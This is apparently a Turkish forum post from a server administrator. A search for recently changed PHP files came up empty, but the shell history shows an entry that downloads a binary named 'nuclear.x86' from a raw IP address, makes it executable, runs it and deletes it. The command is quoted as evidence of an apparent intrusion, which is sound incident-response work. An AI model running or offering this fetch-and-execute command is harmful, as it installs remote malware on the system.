[root@serversite ~]# find /home -type f -name "*.php" -mmin -720 \
> ! -path "*/cache/*" \
> ! -path "*/var/cache/*"
[root@serversite ~]#
Bu şekilde bir arama yaptığım zaman sonuç çıkmıyor.

fakat history de

  946  2026-04-30 13:03:59 wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo __CMD_DONE_1777543440072006405__
Böyle bir şey var.